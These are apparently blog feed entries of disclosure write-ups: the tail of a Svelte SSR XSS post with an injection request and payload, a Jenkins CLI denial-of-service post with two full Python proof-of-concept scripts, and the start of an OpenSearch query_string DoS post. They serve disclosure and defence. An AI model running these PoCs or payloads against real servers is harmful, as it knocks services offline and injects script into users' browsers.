&lt;p&gt;I built a minimal SvelteKit application with async SSR enabled and a route that forwards a query parameter into &lt;code&gt;hydratable&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// src/routes/+page.server.js
export function load({ url }) {
  return {
    key: url.searchParams.get(&apos;k&apos;) ?? &apos;safe-key&apos;
  };
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!-- src/routes/+page.svelte --&amp;gt;
&amp;lt;script&amp;gt;
  import { hydratable } from &apos;svelte&apos;;

  const { data } = $props();
  const value = await hydratable(data.key, () =&amp;gt; Promise.resolve(&apos;ok&apos;));
&amp;lt;/script&amp;gt;

&amp;lt;div&amp;gt;{value}&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;svelte@5.46.0&lt;/code&gt;, the following request reproduces the issue:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl --globoff \
  &apos;http://127.0.0.1:4173/?k=%3C/script%3E%3Cscript%3EglobalThis.__xss%20%3D%20true%3C/script%3E&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The server responds with HTML containing this inline head script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
  {
    const r = (v) =&amp;gt; Promise.resolve(v);
    const h = (window.__svelte ??= {}).h ??= new Map();

    for (const [k, v] of [
      [&quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&quot;,r(&quot;ok&quot;)]
    ]) {
      h.set(k, v);
    }
  }
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At that point the browser sees a closing &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; tag, exits the original block, and runs the injected payload.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Conditions Required For Exploitation&lt;/h2&gt;
&lt;p&gt;Not every Svelte application was affected. The vulnerable path required all of the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The app used Svelte &lt;code&gt;&amp;gt;=5.46.0&lt;/code&gt; and &lt;code&gt;&amp;lt;=5.46.3&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Async SSR was enabled with &lt;code&gt;experimental.async: true&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The app used &lt;code&gt;hydratable(key, fn)&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;key&lt;/code&gt; could be influenced by untrusted input.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In practice, this is realistic in apps that derive hydration keys from route params, query params, tenant identifiers, or helper functions that wrap &lt;code&gt;hydratable&lt;/code&gt; without validating the key.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Root Cause&lt;/h2&gt;
&lt;p&gt;This was a context mismatch bug.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;JSON.stringify&lt;/code&gt; is fine for building JavaScript string literals.&lt;/li&gt;
&lt;li&gt;It is not enough when the serialized value is injected into raw HTML inside a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; element.&lt;/li&gt;
&lt;li&gt;The HTML parser does not care that &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; appears inside a quoted JavaScript string.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Svelte already handled hydratable values safely, but the key path used a weaker serializer than the value path.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Fix In 5.46.4&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;5.46.4&lt;/code&gt; patch is small, but it is very deliberate. Upstream changed the serializer used for hydratable keys:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import * as devalue from &apos;devalue&apos;;

// before
entries.push(`[${JSON.stringify(k)},${v.serialized}]`);

// after
entries.push(`[${devalue.uneval(k)},${v.serialized}]`);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That change matters because &lt;code&gt;devalue.uneval&lt;/code&gt; does more than stringify data. It emits a JavaScript expression that is safe to embed inside inline script content, escaping characters that are dangerous in that context, especially &lt;code&gt;&amp;lt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For the malicious payload:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const payload = &quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the vulnerable serializer produced:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSON.stringify(payload)
// =&amp;gt; &quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;while the patched serializer produces:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;devalue.uneval(payload)
// =&amp;gt; &quot;\u003C/script&amp;gt;\u003Cscript&amp;gt;globalThis.__xss = true\u003C/script&amp;gt;&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the key detail. The browser&apos;s HTML parser only breaks out of a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; element when it sees a literal &lt;code&gt;&amp;lt;&lt;/code&gt; starting &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt;. After the patch, there is no literal &lt;code&gt;&amp;lt;&lt;/code&gt; in the serialized key anymore, only &lt;code&gt;\u003C&lt;/code&gt;, so the parser never terminates the surrounding script block early.&lt;/p&gt;
&lt;p&gt;Once the script executes, JavaScript interprets &lt;code&gt;\u003C&lt;/code&gt; as &lt;code&gt;&amp;lt;&lt;/code&gt;, so the application still gets the original string value as the map key. In other words, the patch preserves behavior while removing the HTML parsing hazard.&lt;/p&gt;
&lt;p&gt;This also explains why the fix is better than a narrow one-off replacement. Instead of escaping only one payload pattern, Svelte switched to a serializer designed for JavaScript source generation in inline scripts. That aligns the key path with the safer serialization approach already used elsewhere in the hydration pipeline.&lt;/p&gt;
&lt;p&gt;The release also added a regression test under &lt;code&gt;packages/svelte/tests/runtime-runes/samples/hydratable-script-escape/&lt;/code&gt;. The test uses a payload containing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&apos;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;throw new Error(&quot;pwned&quot;)&amp;lt;/script&amp;gt;&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the old behavior were still present, the injected script would execute during hydration and the test would fail immediately. After the patch, the payload remains inert data inside the generated script, so hydration completes normally.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;This is an SSR XSS, so exploitation happens in the browser of whoever loads the vulnerable page. A successful payload can lead to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;session theft&lt;/li&gt;
&lt;li&gt;DOM tampering&lt;/li&gt;
&lt;li&gt;authenticated actions through injected JavaScript&lt;/li&gt;
&lt;li&gt;account compromise, depending on the application&apos;s session model&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The public advisory rates the issue &lt;code&gt;5.3&lt;/code&gt; (&lt;code&gt;CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N&lt;/code&gt;).&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;December 27, 2025: Vulnerability discovered&lt;/li&gt;
&lt;li&gt;December 29, 2025: Vendor contacted&lt;/li&gt;
&lt;li&gt;January 5, 2026: Vendor replied and confirmed the issue&lt;/li&gt;
&lt;li&gt;January 15, 2026: Fix released in &lt;code&gt;svelte@5.46.4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;January 15, 2026: Public disclosure and &lt;code&gt;CVE-2025-15265&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/lydian&quot;&gt;Fluid Attacks advisory: Lydian&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/sveltejs/svelte/security/advisories/GHSA-6738-r8g5-qwp3&quot;&gt;GitHub advisory: GHSA-6738-r8g5-qwp3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/sveltejs/svelte/releases/tag/svelte%405.46.4&quot;&gt;Svelte release &lt;code&gt;5.46.4&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/sveltejs/svelte&quot;&gt;Svelte repository&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
</content:encoded></item><item><title>CVE-2025-67635: Unauthenticated DoS in the Jenkins CLI full-duplex endpoint</title><link>http://caverav.cl/posts/jenkins-cli-dos/jenkins-cli-dos/</link><guid isPermaLink="true">http://caverav.cl/posts/jenkins-cli-dos/jenkins-cli-dos/</guid><description>[Race conditions](https://db.fluidattacks.com/wek/124/) and missing timeouts in Jenkins&apos; plain CLI endpoint let anyone exhaust servlet threads without Overall/Read.</description><pubDate>Fri, 12 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Jenkins’ plain CLI endpoint (&lt;code&gt;/cli?remoting=false&lt;/code&gt;) pairs two POST requests (download/upload) via a shared &lt;code&gt;Session&lt;/code&gt; UUID and is reachable without Overall/Read.&lt;/li&gt;
&lt;li&gt;Two bugs stack: an unsynchronized &lt;code&gt;HashMap&lt;/code&gt; in &lt;code&gt;CLIAction&lt;/code&gt; drops one half of the session (&lt;a href=&quot;https://db.fluidattacks.com/wek/124/&quot;&gt;race condition&lt;/a&gt;), and the CLI protocol wait loops (&lt;code&gt;ServerSideImpl.run&lt;/code&gt;, &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt;) have &lt;strong&gt;no timeout&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Attackers can finish their HTTP calls in milliseconds yet strand Jetty threads for 15s (race window) or indefinitely (abandoned protocol), causing controller-wide &lt;a href=&quot;https://db.fluidattacks.com/wek/002/&quot;&gt;asymmetric DoS&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Affects core ≤ 2.540 and LTS ≤ 2.528.2 (CWE-362/CWE-404, CVSS 7.5). Fixed in 2.541 / 2.528.3 by using &lt;code&gt;ConcurrentHashMap&lt;/code&gt;, adding handshake timeouts, and closing streams on error.&lt;/li&gt;
&lt;li&gt;Mitigate now: upgrade, or block the plain CLI endpoint from untrusted networks, capture thread dumps to confirm no threads sit in &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; or &lt;code&gt;FullDuplexHttpService.upload/download&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;What the endpoint does&lt;/h2&gt;
&lt;p&gt;The non-Remoting CLI builds a full-duplex channel from two HTTP POSTs:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Download side&lt;/strong&gt;: &lt;code&gt;Side: download&lt;/code&gt;, opens &lt;code&gt;cli?remoting=false&lt;/code&gt;, server writes a byte and waits for the upload half.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Upload side&lt;/strong&gt;: &lt;code&gt;Side: upload&lt;/code&gt;, same &lt;code&gt;Session&lt;/code&gt; UUID, provides the input stream.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;hudson.cli.CLIAction&lt;/code&gt; wires this to &lt;code&gt;jenkins.util.FullDuplexHttpService&lt;/code&gt;, storing active sessions in a cross-request registry.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Root cause #1 - unsynchronized session registry (&lt;a href=&quot;https://db.fluidattacks.com/wek/124/&quot;&gt;race condition&lt;/a&gt;)&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;CLIAction&lt;/code&gt; keeps the session map in a plain &lt;code&gt;HashMap&lt;/code&gt; shared by all request threads:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// core/src/main/java/hudson/cli/CLIAction.java:83
private final transient Map&amp;lt;UUID, FullDuplexHttpService&amp;gt; duplexServices = new HashMap&amp;lt;&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;FullDuplexHttpService.Response.generateResponse&lt;/code&gt; does &lt;code&gt;services.put(uuid, service)&lt;/code&gt; for the download side, and &lt;code&gt;services.get(uuid)&lt;/code&gt; for the upload side. Because &lt;code&gt;HashMap&lt;/code&gt; is not thread-safe, concurrent puts/gets under load can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Return &lt;code&gt;null&lt;/code&gt; for a valid download side&lt;/li&gt;
&lt;li&gt;Drop entries during a resize&lt;/li&gt;
&lt;li&gt;Leave download threads inside &lt;code&gt;FullDuplexHttpService.download&lt;/code&gt; waiting up to 15 s for an upload that already arrived&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Result: every racy pair ties up a servlet thread for the full timeout while the attacker’s sockets close immediately, causing an &lt;a href=&quot;https://db.fluidattacks.com/wek/002/&quot;&gt;asymmetric DoS&lt;/a&gt; and violating &lt;a href=&quot;https://db.fluidattacks.com/req/337/&quot;&gt;REQ-337&lt;/a&gt; (“Make critical logic flows thread safe”).&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Root cause #2 - missing protocol timeouts (deterministic hang)&lt;/h2&gt;
&lt;p&gt;Even when the two halves pair correctly, the protocol handshake can deadlock because neither side times out:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// core/src/main/java/hudson/cli/CLIAction.java:300
synchronized (this) {
    while (!ready) {      // waits forever if client never sends &quot;start&quot;
        wait();
    }
}
// core/src/main/java/jenkins/util/FullDuplexHttpService.java:145
while (!completed) {       // no deadline if download side dies early
    wait();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the client drops the connection before sending CLI frames, the download thread blocks in &lt;code&gt;ServerSideImpl.run()&lt;/code&gt; and the upload thread blocks in &lt;code&gt;upload()&lt;/code&gt; &lt;strong&gt;with no timeout&lt;/strong&gt;, consuming two Jetty threads per attempt until the controller is exhausted.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Exploitation notes&lt;/h2&gt;
&lt;p&gt;Both vectors require only network reachability to &lt;code&gt;/cli&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Scenario A (&lt;a href=&quot;https://db.fluidattacks.com/wek/124/&quot;&gt;race condition&lt;/a&gt;)&lt;/strong&gt;: fire overlapping download/upload pairs with slight jitter so the upload half occasionally sees &lt;code&gt;null&lt;/code&gt;. Threads pile up in &lt;code&gt;FullDuplexHttpService.download&lt;/code&gt; for ~15 s each.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scenario B (abandonment)&lt;/strong&gt;: open both halves, let them pair, then close without sending CLI frames. Threads stay in &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; and &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt; indefinitely, no timing window needed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below are the exact PoCs shared with the Jenkins security team:&lt;/p&gt;
&lt;h3&gt;PoC: racecond_a.py (HashMap race, two downloads per UUID)&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
import requests
import uuid
import concurrent.futures
import sys

def create_download(jenkins_url, session_id, session):
    headers = {&apos;Session&apos;: session_id, &apos;Side&apos;: &apos;download&apos;}
    try:
        response = session.post(
            f&quot;{jenkins_url}/cli?remoting=false&quot;,
            headers=headers,
            data=b&apos;&apos;,
            timeout=20
        )
        return response.status_code
    except requests.exceptions.Timeout:
        return &apos;TIMEOUT&apos;
    except Exception:
        return &apos;ERROR&apos;

def main(jenkins_url, num_sessions):
    session = requests.Session()
    adapter = requests.adapters.HTTPAdapter(
        max_retries=0,
        pool_connections=200,
        pool_maxsize=200
    )
    session.mount(&apos;http://&apos;, adapter)
    session.mount(&apos;https://&apos;, adapter)
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=200) as executor:
        futures = []
        
        for i in range(num_sessions):
            session_id = str(uuid.uuid4())
            futures.append(executor.submit(create_download, jenkins_url, session_id, session))
            futures.append(executor.submit(create_download, jenkins_url, session_id, session))
        
        timeouts = 0
        for future in concurrent.futures.as_completed(futures):
            if future.result() == &apos;TIMEOUT&apos;:
                timeouts += 1
    
    print(f&quot;Timeouts: {timeouts}/{num_sessions*2}&quot;)

if __name__ == &quot;__main__&quot;:
    jenkins_url = sys.argv[1] if len(sys.argv) &amp;gt; 1 else &quot;http://localhost:8081&quot;
    num_sessions = int(sys.argv[2]) if len(sys.argv) &amp;gt; 2 else 1000
    main(jenkins_url, num_sessions)
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;PoC: racecond_b.py (protocol abandonment, deterministic hang)&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
import socket
import struct
import uuid
import time
import threading
import sys

JENKINS_HOST = &quot;localhost&quot;
JENKINS_PORT = 8081

OP_ARG = 0
OP_LOCALE = 1
OP_ENCODING = 2

def send_cli_frame(sock, opcode, data=b&quot;&quot;):
    if isinstance(data, str):
        data = data.encode(&apos;utf-8&apos;)
    length = len(data)
    frame = struct.pack(&apos;&amp;gt;I&apos;, length) + struct.pack(&apos;B&apos;, opcode) + data
    sock.sendall(frame)

def establish_download(session_id, duration=30):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((JENKINS_HOST, JENKINS_PORT))
        request = f&quot;&quot;&quot;POST /cli?remoting=false HTTP/1.1\r
Host: {JENKINS_HOST}:{JENKINS_PORT}\r
Session: {session_id}\r
Side: download\r
Content-Length: 0\r
Connection: keep-alive\r
\r
&quot;&quot;&quot;
        sock.sendall(request.encode())
        response = b&quot;&quot;
        while b&quot;\r\n\r\n&quot; not in response:
            chunk = sock.recv(1)
            if not chunk:
                return False
            response += chunk
        sock.recv(1)
        time.sleep(duration)
        sock.close()
        return True
    except Exception:
        return False

def establish_upload_without_start(session_id, duration=30):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((JENKINS_HOST, JENKINS_PORT))
        request = f&quot;&quot;&quot;POST /cli?remoting=false HTTP/1.1\r
Host: {JENKINS_HOST}:{JENKINS_PORT}\r
Session: {session_id}\r
Side: upload\r
Transfer-Encoding: chunked\r
Connection: keep-alive\r
\r
&quot;&quot;&quot;
        sock.sendall(request.encode())
        response = b&quot;&quot;
        while b&quot;\r\n\r\n&quot; not in response:
            chunk = sock.recv(1)
            if not chunk:
                return False
            response += chunk
        send_cli_frame(sock, OP_ARG, &quot;help&quot;)
        time.sleep(0.05)
        send_cli_frame(sock, OP_LOCALE, &quot;en_US&quot;)
        time.sleep(0.05)
        send_cli_frame(sock, OP_ENCODING, &quot;UTF-8&quot;)
        time.sleep(duration)
        sock.close()
        return True
    except Exception:
        return False

def create_abandoned_session(session_id, duration=30):
    download_thread = threading.Thread(
        target=establish_download,
        args=(session_id, duration),
        daemon=True
    )
    download_thread.start()
    time.sleep(0.3)
    upload_thread = threading.Thread(
        target=establish_upload_without_start,
        args=(session_id, duration),
        daemon=True
    )
    upload_thread.start()
    return download_thread, upload_thread

def main(num_sessions):
    threads = []
    for i in range(num_sessions):
        session_id = str(uuid.uuid4())
        download_t, upload_t = create_abandoned_session(session_id, duration=60)
        threads.extend([download_t, upload_t])
        time.sleep(0.1)
    
    for t in threads:
        t.join()
    
    print(f&quot;Created {num_sessions} sessions&quot;)

if __name__ == &quot;__main__&quot;:
    num_sessions = int(sys.argv[1]) if len(sys.argv) &amp;gt; 1 else 500
    main(num_sessions)
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Evidence&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Thread dump (Scenario B, Jenkins 2.516.2 test controller)&lt;/strong&gt; – stuck in the exact call sites with no timeout:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;at hudson.cli.CLIAction$ServerSideImpl.run(CLIAction.java:319)
- locked &amp;lt;0x00000000f0d9ba90&amp;gt; (a hudson.cli.CLIAction$ServerSideImpl)
at jenkins.util.FullDuplexHttpService.download(FullDuplexHttpService.java:119)

at jenkins.util.FullDuplexHttpService.upload(FullDuplexHttpService.java:146)
- locked &amp;lt;0x00000000f0d9aaa0&amp;gt; (a hudson.cli.CLIAction$PlainCliEndpointResponse$1)
at jenkins.util.FullDuplexHttpService$Response.generateResponse(FullDuplexHttpService.java:191)
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Video evidence&lt;/strong&gt;: end-to-end crash reproduction against a fresh controller:
&amp;lt;iframe src=&quot;https://www.youtube.com/embed/zl7bp5FN5Bk&quot; title=&quot;Jenkins CLI DoS (SECURITY-3630) crash capture&quot; width=&quot;100%&quot; height=&quot;360&quot; allowfullscreen loading=&quot;lazy&quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/li&gt;
&lt;li&gt;On a vulnerable build you will see dozens of request threads waiting in those call sites, and regular CLI calls start timing out.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unauthenticated DoS&lt;/strong&gt;: no Overall/Read required to hit &lt;code&gt;/cli?remoting=false&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low attacker cost&lt;/strong&gt;: sockets close immediately, the server holds the work (15 s per race attempt, infinite for abandonment).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Controller-wide degradation&lt;/strong&gt;: servlet threads and I/O streams back up, other endpoints time out.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Patch details (core commit &lt;a href=&quot;https://github.com/jenkinsci/jenkins/commit/efa1816322026f2b9235a27eee814bcc7ba0a764&quot;&gt;efa1816&lt;/a&gt;)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;CLIAction&lt;/code&gt; now stores sessions in a &lt;code&gt;ConcurrentHashMap&lt;/code&gt;, removing the racy &lt;code&gt;HashMap&lt;/code&gt; drops that powered the &lt;a href=&quot;https://db.fluidattacks.com/wek/002/&quot;&gt;asymmetric DoS&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ServerSideImpl.run&lt;/code&gt; and &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt; adopted &lt;code&gt;CONNECTION_TIMEOUT&lt;/code&gt;-bounded waits with 1s wake-ups and DEBUG logs, so abandoned handshakes unwind instead of parking threads.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;PlainCLIProtocol&lt;/code&gt; always calls &lt;code&gt;side.handleClose()&lt;/code&gt; in a &lt;code&gt;finally&lt;/code&gt; block, ensuring both halves tear down even on read errors or runtime exceptions.&lt;/li&gt;
&lt;li&gt;Regression coverage landed in &lt;code&gt;Security3630Test&lt;/code&gt; (JUnit 5): it shrinks the CLI timeout for tests, exercises the previous race with concurrent CLI invocations, and asserts threads are released after truncated streams.&lt;/li&gt;
&lt;li&gt;Net effect: the CLI download/upload pairing now fails fast and frees Jetty threads instead of blocking indefinitely on missing counterparts.&lt;/li&gt;
&lt;li&gt;The changes bring the full-duplex CLI path back into compliance with &lt;a href=&quot;https://db.fluidattacks.com/req/337/&quot;&gt;REQ-337&lt;/a&gt;: “Make critical logic flows thread safe.”&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;CVE and advisory references&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;SECURITY-3630 is assigned &lt;strong&gt;CVE-2025-67635&lt;/strong&gt; (CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). See the CNA record on &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-67635&quot;&gt;cve.org&lt;/a&gt; and the NIST entry on &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-67635&quot;&gt;NVD&lt;/a&gt; for canonical metadata.&lt;/li&gt;
&lt;li&gt;Jenkins’ official write-up: &lt;a href=&quot;https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3630&quot;&gt;Jenkins Security Advisory 2025-12-10: SECURITY-3630&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Fix and hardening&lt;/h2&gt;
&lt;p&gt;If you cannot upgrade immediately:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Disable or firewall the plain CLI endpoint, prefer the WebSocket CLI with proper auth.&lt;/li&gt;
&lt;li&gt;Lower Jetty thread caps only as a last resort (does not remove the bug).&lt;/li&gt;
&lt;li&gt;Monitor thread dumps for &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; and &lt;code&gt;FullDuplexHttpService.upload/download&lt;/code&gt; wait states.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Indicators of compromise&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Repeated &lt;code&gt;IOException: No download side found for &amp;lt;uuid&amp;gt;&lt;/code&gt; in logs.&lt;/li&gt;
&lt;li&gt;Thread dumps showing many &lt;code&gt;TIMED_WAITING&lt;/code&gt; at &lt;code&gt;FullDuplexHttpService.download&lt;/code&gt; or &lt;code&gt;WAITING&lt;/code&gt; at &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; / &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Spikes in &lt;code&gt;/cli?remoting=false&lt;/code&gt; requests lacking authentication headers.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Patch promptly, this is a cheap, network-reachable DoS path in default Jenkins deployments.&lt;/p&gt;
</content:encoded></item><item><title>CVE-2025-9624: Nested Boolean/Disjunction Asymmetric DoS in Amazon&apos;s OpenSearch query_string - Chick</title><link>http://caverav.cl/posts/opensearch-dos/opensearch-dos/</link><guid isPermaLink="true">http://caverav.cl/posts/opensearch-dos/opensearch-dos/</guid><description>How I found CVE-2025-9624, an asymmetric Denial of Service in Amazon&apos;s OpenSearch&apos;s query_string handling, and how it was fixed with search.query.max_query_string_length.</description><pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;While testing OpenSearch 3.2.0, I found an &lt;strong&gt;asymmetric Denial of
Service (DoS)&lt;/strong&gt; condition in how the engine handles &lt;code&gt;query_string&lt;/code&gt;
queries.&lt;/p&gt;
&lt;p&gt;By crafting Lucene-style inputs that &lt;strong&gt;nest boolean operators
and disjunctions&lt;/strong&gt;, it&apos;s possible to build huge query trees that stay
under OpenSearch&apos;s per-node clause limits but &lt;strong&gt;explode the overall
number of nodes&lt;/strong&gt;. The result is excessive CPU usage and heap pressure
during query parsing, rewriting, and scoring, eventually leading to a
process being killed by the OS or container orchestrator (e.g., exit
code &lt;code&gt;137&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;This issue was assigned &lt;strong&gt;CVE-2025-9624&lt;/strong&gt; and classified under
&lt;strong&gt;CWE-674: Uncontrolled Recursion&lt;/strong&gt;. It affects OpenSearch where
&lt;code&gt;query_string&lt;/code&gt; inputs from potentially untrusted sources can reach the
cluster without an upper bound on complexity. After discussing with the Amazon&apos;s OpenSearch team, the problem was fixed by
introducing a new cluster-wide setting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;search.query.max_query_string_length
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which rejects overly long query strings early in the parsing stage.&lt;/p&gt;
&lt;p&gt;If you expose &lt;code&gt;query_string&lt;/code&gt; to untrusted or semi-trusted clients, you
should:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Upgrade to OpenSearch 3.3.0 or later&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure a reasonable &lt;code&gt;search.query.max_query_string_length&lt;/code&gt;
value&lt;/strong&gt; for your environment.&lt;/li&gt;
&lt;li&gt;Avoid letting arbitrary users send raw Lucene-style &lt;code&gt;query_string&lt;/code&gt;
input when a safer DSL or templated queries would do.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Background: OpenSearch, query_string and Clause Limits&lt;/h2&gt;
&lt;p&gt;OpenSearch is built on top of Apache Lucene and exposes multiple ways to
express queries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Structured JSON DSL (e.g., &lt;code&gt;bool&lt;/code&gt;, &lt;code&gt;term&lt;/code&gt;, &lt;code&gt;range&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Higher-level helpers like &lt;code&gt;multi_match&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;&lt;code&gt;query_string&lt;/code&gt;&lt;/strong&gt; query, which lets users write Lucene-style
strings such as:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;(title:security OR description:&quot;denial of service&quot;) AND product:opensearch
&lt;/code&gt;&lt;/pre&gt;
